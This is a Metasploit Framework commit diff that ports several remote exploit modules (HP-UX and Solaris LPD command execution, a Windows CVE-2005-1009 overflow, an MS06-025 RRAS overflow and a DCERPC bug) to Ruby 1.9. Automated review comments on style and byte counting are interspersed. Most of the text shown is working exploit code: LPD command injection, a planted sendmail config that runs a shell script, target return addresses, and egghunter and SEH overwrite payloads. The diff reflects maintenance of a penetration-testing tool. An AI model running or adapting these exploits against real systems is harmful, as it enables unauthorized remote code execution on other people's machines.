1.9 compatibility fixes for lpd exploits, clarification in the print messages that we are *trying* to exploit something, not absolutely doing so
git-svn-id: file:///home/svn/framework3/trunk@8916 4d416f70-5f16-0410-b530-b9f4589650da
parent
6d606a7587
commit
22cb5a6bea
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'HP-UX LPD Command Execution',
|
||||
'Description' => %q{
|
||||
This exploit abuses an unpublished vulnerability in the
|
||||
|
@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
target. This vulnerability was silently patched with the
|
||||
buffer overflow flaws addressed in HP Security Bulletin
|
||||
HPSBUX0208-213.
|
||||
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'Version' => '$Revision$',
|
||||
|
@ -53,13 +53,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'generic perl telnet',
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic Target', { }]
|
||||
],
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(515)
|
||||
|
@ -73,36 +73,37 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# Connect to the LPD service
|
||||
connect
|
||||
|
||||
|
||||
print_status("Sending our job request with embedded command string...")
|
||||
# Send the job request with the encoded command
|
||||
sock.put(
|
||||
"\x02" + rand_text_alphanumeric(3) + jid +
|
||||
"`" + payload.encoded + "`\n"
|
||||
)
|
||||
|
||||
|
||||
res = sock.get_once(1)
|
||||
if (res[0] != 0)
|
||||
if !(res and res[0,1] == "\x00")
|
||||
print_status("The target did not accept our job request")
|
||||
return
|
||||
end
|
||||
|
||||
print_status("Sending our fake control file...")
|
||||
print_status("Sending our fake control file...")
|
||||
sock.put("\x02 32 cfA" + rand_text_alphanumeric(8) + "\n")
|
||||
res = sock.get_once(1)
|
||||
if (res[0] != 0)
|
||||
if !(res and res[0,1] == "\x00")
|
||||
print_status("The target did not accept our control file")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
print_status("Forcing an error and hijacking the cleanup routine...")
|
||||
|
||||
|
||||
begin
|
||||
sock.put(rand_text_alphanumeric(16384))
|
||||
disconnect
|
||||
rescue
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
end
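Review bot: The rewritten guards `if !(res and res[0,1] == "\x00")` mix a negated boolean with the low-precedence `and`; the expression is correct only because it is fully parenthesized, and the idiomatic form is `unless res && res[0,1] == "\x00"`. The same construction appears twice in this hunk and twice more in `send_file` of the Solaris LPD module in this commit, so one consistent rewrite covers all four. The nil check that was added is the real fix here, since `sock.get_once(1)` can return nil on timeout and the old `res[0] != 0` would have raised on 1.9 as well as on nil.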
|
||||
|
||||
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Solaris LPD Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits an arbitrary command execution flaw in
|
||||
|
@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
up to and including 8.0. This module uses a technique
|
||||
discovered by Dino Dai Zovi to exploit the flaw without
|
||||
needing to know the resolved name of the attacking system.
|
||||
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm', 'ddz' ],
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -50,14 +50,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'generic perl telnet',
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic Target', { }]
|
||||
],
|
||||
'DisclosureDate' => 'Aug 31 2001',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(515)
|
||||
|
@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# This is the temporary path created in the spool directory
|
||||
spath = "/var/spool/print"
|
||||
|
||||
|
||||
# The job ID is squashed down to three decimal digits
|
||||
jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
|
||||
|
||||
|
@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
"P"+"\\\"-C"+spath+"/"+jid+"mail.cf\\\" nobody\n"+
|
||||
"f"+"dfA"+jid+"config\n"+
|
||||
"f"+"dfA"+jid+"script\n"
|
||||
|
||||
|
||||
|
||||
# The mail configuration file
|
||||
mailcf =
|
||||
|
@ -102,10 +102,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
"\n"+
|
||||
"Mlocal P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"+
|
||||
"Mprog P=/bin/sh, J=S, S=0, R=0, A=sh #{spath}/#{jid}script\n"
|
||||
|
||||
|
||||
# Establish the first connection to the server
|
||||
sock1 = connect(false)
|
||||
|
||||
|
||||
# Request a cascaded job
|
||||
sock1.put("\x02metasploit:framework\n")
|
||||
res = sock1.get_once
|
||||
|
@ -113,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("The target did not accept our job request command")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
print_status("Configuring the spool directory...")
|
||||
if !(
|
||||
send_file(sock1, 2, "cfA" + jid + "metasploit", control) and
|
||||
|
@ -123,19 +123,19 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sock1.close
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
# Establish the second connection to the server
|
||||
sock2 = connect(false)
|
||||
|
||||
|
||||
# Request another cascaded job
|
||||
sock2.put("\x02localhost:metasploit\n")
|
||||
res = sock2.get_once
|
||||
if (not res)
|
||||
print_status("The target did not accept our second job request command")
|
||||
return
|
||||
end
|
||||
|
||||
print_status("Triggering the vulnerable call to the mail program...")
|
||||
end
|
||||
|
||||
print_status("Attempting to trigger the vulnerable call to the mail program...")
|
||||
if !(
|
||||
send_file(sock2, 2, "cfA" + jid + "metasploit", control) and
|
||||
send_file(sock2, 3, "dfa" + jid + "config", mailcf)
|
||||
|
@ -143,36 +143,37 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sock1.close
|
||||
sock2.close
|
||||
return
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
sock1.close
|
||||
sock2.close
|
||||
|
||||
|
||||
print_status("Waiting up to 60 seconds for the payload to execute...")
|
||||
sleep(60)
|
||||
|
||||
|
||||
handler
|
||||
end
|
||||
|
||||
def send_file(s, type, name, data='')
|
||||
|
||||
|
||||
s.put(type.chr + data.length.to_s + " " + name + "\n")
|
||||
res = s.get_once(1)
|
||||
if !(res and res[0] == ?\0)
|
||||
if !(res and res[0,1] == "\x00")
|
||||
print_status("The target did not accept our control file command (#{name})")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
s.put(data)
|
||||
s.put("\x00")
|
||||
res = s.get_once(1)
|
||||
if !(res and res[0] == ?\0)
|
||||
if !(res and res[0,1] == "\x00")
|
||||
print_status("The target did not accept our control file data (#{name})")
|
||||
return
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
print_status(sprintf(" Uploaded %.4d bytes >> #{name}", data.length))
|
||||
return true
|
||||
end
|
||||
|
||||
end
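Review bot: `send_file` still builds the LPD receive-file command with `data.length.to_s`, which on Ruby 1.9 is a character count rather than a byte count, so the length prefix sent to the daemon can disagree with the bytes that follow for any non-ASCII `data`; since this commit's purpose is 1.9 compatibility, `s.put(type.chr + data.bytesize.to_s + " " + name + "\n")` (and `data.bytesize` in the `sprintf` summary) keeps the protocol consistent on both interpreters. The control and mail.cf strings built in this module look ASCII-only, so the mismatch is latent today rather than a live failure.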
|
||||
|
||||
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'Author' => [ 'hdm', '<nolimit.bugtraq[at]ri0tnet.net>' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2005-1009'],
|
||||
['OSVDB', '15234'],
|
||||
|
@ -44,8 +44,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
['Windows 2000 SP4 English', { 'Ret' => 0x75036d7e, 'UEF' => 0x7c54144c } ],
|
||||
['Windows XP SP0/SP1 English', { 'Ret' => 0x7c369bbd, 'UEF' => 0x77ed73b4 } ],
|
||||
['Windows 2000 SP4 English', { 'Ret' => 0x75036d7e, 'UEF' => 0x7c54144c } ],
|
||||
['Windows XP SP0/SP1 English', { 'Ret' => 0x7c369bbd, 'UEF' => 0x77ed73b4 } ],
|
||||
],
|
||||
|
||||
'Privileged' => false,
|
||||
|
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
connect
|
||||
|
||||
hname = "METASPLOIT"
|
||||
probe =
|
||||
probe =
|
||||
"\xc9\x00\x00\x00\x01\xcb\x22\x77\xc9\x17\x00\x00\x00\x69\x3b\x69" +
|
||||
"\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69" +
|
||||
"\x3b\x73\x3b\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00" +
|
||||
|
@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def exploit
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
head =
|
||||
head =
|
||||
"\x00\x00\x02\x01\x00\x00\x00\x8f\xd0\xf0\xca\x0b\x00\x00\x00\x69" +
|
||||
"\x3b\x62\x3b\x6f\x3b\x6f\x3b\x7a\x3b\x00\x11\x57\x3c\x42\x00\x01" +
|
||||
"\xb9\xf9\xa2\xc8\x00\x00\x00\x00\x03\x00\x00\x00\x00\x01\xa5\x97" +
|
||||
|
@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sent = 0
|
||||
try = 0
|
||||
|
||||
15.times {
|
||||
15.times {
|
||||
try += 1
|
||||
connect
|
||||
sent = sock.put(pattern)
|
||||
|
@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Overflow request sent, sleeping fo four seconds (#{try} tries)")
|
||||
sleep(4)
|
||||
|
||||
print_status("Triggering memory overwrite by reconnecting...")
|
||||
print_status("Attempting to trigger memory overwrite by reconnecting...")
|
||||
|
||||
begin
|
||||
10.times { |x|
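Review bot: The status line two lines above the reworded "Attempting to trigger memory overwrite" message still reads "sleeping fo four seconds"; since this commit is already editing the user-facing strings of this module, it should also correct it to `print_status("Overflow request sent, sleeping for four seconds (#{try} tries)")`. The `10.times { |x|` block opened at the end of the hunk continues outside it, and the enclosing `exploit` method starts before the hunk.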
|
||||
|
@ -154,7 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Waiting for payload to execute...")
|
||||
|
||||
handler
|
||||
disconnect
|
||||
disconnect
|
||||
end
|
||||
|
||||
def wfs_delay
|
||||
|
@ -162,3 +162,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
@ -3,7 +3,7 @@
|
|||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -21,13 +21,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::SMB
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft RRAS Service RASMAN Registry Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a registry-based stack overflow in the Windows Routing
|
||||
and Remote Access Service. Since the service is hosted inside svchost.exe,
|
||||
a failed exploit attempt can cause other system services to fail as well.
|
||||
A valid username and password is required to exploit this flaw on Windows 2000.
|
||||
This module exploits a registry-based stack overflow in the Windows Routing
|
||||
and Remote Access Service. Since the service is hosted inside svchost.exe,
|
||||
a failed exploit attempt can cause other system services to fail as well.
|
||||
A valid username and password is required to exploit this flaw on Windows 2000.
|
||||
When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
|
||||
Exploiting this flaw involves two distinct steps - creating the registry key
|
||||
and then triggering an overwrite based on a read of this key. Once the key is
|
||||
|
@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'CVE', '2006-2370' ],
|
||||
[ 'OSVDB', '26437' ],
|
||||
[ 'BID', '18325' ],
|
||||
[ 'MSB', 'MS06-025' ]
|
||||
[ 'MSB', 'MS06-025' ]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' =>
|
||||
|
@ -58,22 +58,22 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows 2000 SP4', { 'Ret' => 0x750217ae } ], # call esi
|
||||
],
|
||||
'DefaultTarget' => 0))
|
||||
register_options(
|
||||
[
|
||||
[
|
||||
OptString.new('SMBPIPE', [ true, "Rawr.", 'router']),
|
||||
], self.class)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
# Post authentication bugs are rarely useful during automation
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
connect()
|
||||
smb_login()
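Review bot: The `SMBPIPE` option in the reindented `register_options` block still carries the placeholder description `"Rawr."`, while the module description above states that XP SP1 requires this option to be set to 'SRVSVC'; operators only see the option description in the console, so it should say what the value means, e.g. `OptString.new('SMBPIPE', [ true, "The named pipe to bind through (router, or SRVSVC for XP SP1)", 'router'])`. The `exploit` method opened at the end of the hunk continues outside it.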
|
||||
|
@ -82,46 +82,46 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Generate the egghunter payload
|
||||
hunter = generate_egghunter()
|
||||
egg = hunter[1]
|
||||
|
||||
|
||||
# Pick a "filler" character that we know doesn't get mangled
|
||||
# by the wide string conversion routines
|
||||
# by the wide string conversion routines
|
||||
filset = "\xc1\xff\x67\x1b\xd3\xa3\xe7"
|
||||
fil = filset[ rand(filset.length) ].chr
|
||||
|
||||
|
||||
# Bind to the actual DCERPC interface
|
||||
handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
|
||||
print_status("Binding to #{handle}")
|
||||
dcerpc_bind(handle)
|
||||
print_status("Bound to #{handle}")
|
||||
|
||||
# Add giant blocks of guard data before and after the egg
|
||||
eggdata =
|
||||
# Add giant blocks of guard data before and after the egg
|
||||
eggdata =
|
||||
fil * 1024 +
|
||||
egg +
|
||||
egg +
|
||||
payload.encoded +
|
||||
egg +
|
||||
egg +
|
||||
payload.encoded +
|
||||
fil * 1024
|
||||
|
||||
|
||||
# Place the egghunter where ESI happens to point
|
||||
bof = (fil * 178)
|
||||
bof[84, hunter[0].length] = hunter[0]
|
||||
|
||||
|
||||
# Overwrite the SEH ptr, even though ESP is smashed
|
||||
# The handle after the ret must be an invalid address
|
||||
pat =
|
||||
(fil * 886) +
|
||||
NDR.long(target.ret) +
|
||||
pat =
|
||||
(fil * 886) +
|
||||
NDR.long(target.ret) +
|
||||
(fil * 3) + "\xc0" +
|
||||
bof
|
||||
|
||||
type2 =
|
||||
|
||||
type2 =
|
||||
NDR.string( (fil * 1024) + "\x00" ) +
|
||||
NDR.string( pat + "\x00" ) +
|
||||
NDR.string( (fil * 4096) + "\x00" ) +
|
||||
NDR.long(rand(0xffffffff)) +
|
||||
NDR.long(rand(0xffffffff))
|
||||
|
||||
type1 =
|
||||
NDR.long(rand(0xffffffff))
|
||||
|
||||
type1 =
|
||||
NDR.long(rand(0xffffffff)) + # OperatorDial
|
||||
NDR.long(rand(0xffffffff)) + # PreviewPhoneNumber
|
||||
NDR.long(rand(0xffffffff)) + # UseLocation
|
||||
|
@ -156,24 +156,24 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
NDR.long(rand(0xffffffff)) +
|
||||
|
||||
NDR.string("\x00" * 514) +
|
||||
|
||||
NDR.long(rand(0xffffffff)) +
|
||||
NDR.long(rand(0xffffffff))
|
||||
|
||||
stubdata =
|
||||
type1 +
|
||||
NDR.long(rand(0xffffffff)) +
|
||||
|
||||
NDR.long(rand(0xffffffff)) +
|
||||
NDR.long(rand(0xffffffff))
|
||||
|
||||
stubdata =
|
||||
type1 +
|
||||
NDR.long(rand(0xffffffff)) +
|
||||
eggdata
|
||||
|
||||
|
||||
print_status('Stub is ' + stubdata.length.to_s + ' bytes long.')
|
||||
|
||||
begin
|
||||
print_status('Creating the malicious registry key...')
|
||||
response = dcerpc.call(0xA, stubdata)
|
||||
|
||||
print_status('Triggering the base pointer overwrite...')
|
||||
|
||||
print_status('Attempting to trigger the base pointer overwrite...')
|
||||
response = dcerpc.call(0xA, stubdata)
|
||||
|
||||
|
||||
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
|
||||
end
|
||||
|
||||
|
@ -182,3 +182,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
@ -927,7 +927,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
NDR.long(0)
|
||||
|
||||
begin
|
||||
print_status("Triggering the vulnerability...")
|
||||
print_status("Attempting to trigger the vulnerability...")
|
||||
dcerpc.call(0x1f, stub)
|
||||
|
||||
rescue Rex::Proto::DCERPC::Exceptions::NoResponse